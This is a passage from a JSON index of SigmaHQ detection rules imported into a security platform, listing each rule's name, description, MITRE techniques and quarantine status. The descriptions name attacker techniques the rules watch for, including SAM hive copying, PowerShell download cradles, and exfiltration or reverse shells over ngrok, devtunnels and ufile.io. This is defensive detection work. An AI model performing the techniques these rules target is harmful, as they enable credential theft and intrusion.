"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_webdav_external_execution.yml" } }, { "id": "sigmahq-sigma-1af57a4b-460a-4738-9034-db68b880c665", "type": "detection", "name": "PowerShell SAM Copy", "description": "Detects suspicious PowerShell scripts accessing SAM hives", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-sam-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1af57a4b-460a-4738-9034-db68b880c665", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml" } }, { "id": "sigmahq-sigma-1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "type": "detection", "name": "Service Installation with Suspicious Folder Pattern", "description": "Detects service installation with suspicious folder patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installation-with-suspicious-folder-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml" } }, { "id": "sigmahq-sigma-1b3b01c7-84e9-4072-86e5-fc285a41ff23", "type": "detection", "name": "Nslookup PowerShell Download Cradle - ProcessCreation", "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nslookup-powershell-download-cradle-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" } }, { "id": "sigmahq-sigma-1b45b0d1-773f-4f23-aedc-814b759563b1", "type": "detection", "name": "Application AppID Uri Configuration Changes", "description": "Detects when a configuration change is made to an applications AppID URI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-appid-uri-configuration-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b45b0d1-773f-4f23-aedc-814b759563b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml" } }, { "id": "sigmahq-sigma-1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" } }, { "id": "sigmahq-sigma-1bac86ba-41aa-4f62-9d6b-405eac99b485", "type": "detection", "name": "Systemd Service Creation", "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/systemd-service-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1bac86ba-41aa-4f62-9d6b-405eac99b485", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_systemd_service_creation.yml" } }, { "id": "sigmahq-sigma-1bbf25b9-8038-4154-a50b-118f2a32be27", "type": "detection", "name": "Suspicious Windows ANONYMOUS LOGON Local Account Created", "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-anonymous-logon-local-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1bbf25b9-8038-4154-a50b-118f2a32be27", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" } }, { "id": "sigmahq-sigma-1bc2e6c5-0885-472b-bed6-be5ea8eace55", "type": "detection", "name": "MacOS Scripting Interpreter AppleScript", "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-scripting-interpreter-applescript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_applescript.yml" } }, { "id": "sigmahq-sigma-1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "type": "detection", "name": "Suspicious Modification Of Scheduled Tasks", "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-modification-of-scheduled-tasks.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_change.yml" } }, { "id": "sigmahq-sigma-1c12727d-02bf-45ff-a9f3-d49806a3cf43", "type": "detection", "name": "Renamed Plink Execution", "description": "Detects the execution of a renamed version of the Plink binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-plink-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_plink.yml" } }, { "id": "sigmahq-sigma-1c3121ed-041b-4d97-a075-07f54f20fb4a", "type": "detection", "name": "Registry Explorer Policy Modification", "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-explorer-policy-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" } }, { "id": "sigmahq-sigma-1c480e10-7ee1-46d4-8ed2-85f9789e3ce4", "type": "detection", "name": "Group Policy Abuse for Privilege Addition", "description": "Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/group-policy-abuse-for-privilege-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c480e10-7ee1-46d4-8ed2-85f9789e3ce4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_group_policy_abuse_privilege_addition.yml" } }, { "id": "sigmahq-sigma-1c526788-0abe-4713-862f-b520da5e5316", "type": "detection", "name": "Chromium Browser Headless Execution To Mockbin Like Site", "description": "Detects the execution of a Chromium based browser process with the \"headless\" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chromium-browser-headless-execution-to-mockbin-like-site.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c526788-0abe-4713-862f-b520da5e5316", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml" } }, { "id": "sigmahq-sigma-1c563233-030e-4a07-af8c-ee0490a66d3a", "type": "detection", "name": "Suspicious New-PSDrive to Admin Share", "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-new-psdrive-to-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c563233-030e-4a07-af8c-ee0490a66d3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" } }, { "id": "sigmahq-sigma-1c67a717-32ba-409b-a45d-0fb704a73a81", "type": "detection", "name": "System Network Connections Discovery Via Net.EXE", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-connections-discovery-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c67a717-32ba-409b-a45d-0fb704a73a81", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml" } }, { "id": "sigmahq-sigma-1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "type": "detection", "name": "Azure Kubernetes CronJob", "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-cronjob.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml" } }, { "id": "sigmahq-sigma-1c8774a0-44d4-4db0-91f8-e792359c70bd", "type": "detection", "name": "REGISTER_APP.VBS Proxy Execution", "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/register-app-vbs-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" } }, { "id": "sigmahq-sigma-1c8e96cd-2bed-487d-9de0-b46c90cade56", "type": "detection", "name": "Potential Qakbot Registry Activity", "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-qakbot-registry-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml" } }, { "id": "sigmahq-sigma-1ca6bd18-0ba0-44ca-851c-92ed89a61085", "type": "detection", "name": "UAC Bypass Using Consent and Comctl32 - Process", "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-consent-and-comctl32-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" } }, { "id": "sigmahq-sigma-1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b", "type": "detection", "name": "DNS Query To Devtunnels Domain", "description": "Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-devtunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_devtunnels_communication.yml" } }, { "id": "sigmahq-sigma-1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "type": "detection", "name": "DNS Query To Ufile.io", "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-ufile-io.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_ufile_io_query.yml" } }, { "id": "sigmahq-sigma-1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "type": "detection", "name": "Suspicious Rundll32 Invoking Inline VBScript", "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-invoking-inline-vbscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml" } }, { "id": "sigmahq-sigma-1cdd9a09-06c9-4769-99ff-626e2b3991b8", "type": "detection", "name": "Suspicious Double Extension File Execution", "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/suspicious-double-extension-file-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" } }, { "id": "sigmahq-sigma-1ce8c8a3-2723-48ed-8246-906ac91061a6", "type": "detection", "name": "Possible PetitPotam Coerce Authentication Attempt", "description": "Detect PetitPotam coerced authentication activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-petitpotam-coerce-authentication-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_petitpotam_network_share.yml" } }, { "id": "sigmahq-sigma-1cf465a1-2609-4c15-9b66-c32dbe4bfd67", "type": "detection", "name": "Legitimate Application Writing Files In Uncommon Location", "description": "Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.\nAdversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-writing-files-in-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cf465a1-2609-4c15-9b66-c32dbe4bfd67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location.yml" } }, { "id": "sigmahq-sigma-1cf98dc2-fcb0-47c9-8aea-654c9284d1ae", "type": "detection", "name": "Disk Image Creation Via Hdiutil - MacOS", "description": "Detects the execution of the hdiutil utility in order to create a disk image.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disk-image-creation-via-hdiutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1cf98dc2-fcb0-47c9-8aea-654c9284d1ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" } }, { "id": "sigmahq-sigma-1d08ac94-400d-4469-a82f-daee9a908849", "type": "detection", "name": "Communication To Ngrok Tunneling Service Initiated", "description": "Detects an executable initiating a network connection to \"ngrok\" tunneling domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1568.002", "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-ngrok-tunneling-service-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d08ac94-400d-4469-a82f-daee9a908849", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml" } }, { "id": "sigmahq-sigma-1d174d38-8fda-4081-a9b6-56d9763c0cd8", "type": "detection", "name": "Scheduled Task Creation with Curl and PowerShell Execution Combo", "description": "Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.\nThis facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-creation-with-curl-and-powershell-execution-combo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d174d38-8fda-4081-a9b6-56d9763c0cd8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml" } }, { "id": "sigmahq-sigma-1d2ab8ac-1a01-423b-9c39-001510eae8e8", "type": "detection", "name": "Azure AD Health Service Agents Registry Keys Access", "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-health-service-agents-registry-keys-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" } }, { "id": "sigmahq-sigma-1d2de8a6-4803-4fde-b85b-f58f3aa7a705", "type": "detection", "name": "Potentially Suspicious WDAC Policy File Creation", "description": "Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-wdac-policy-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 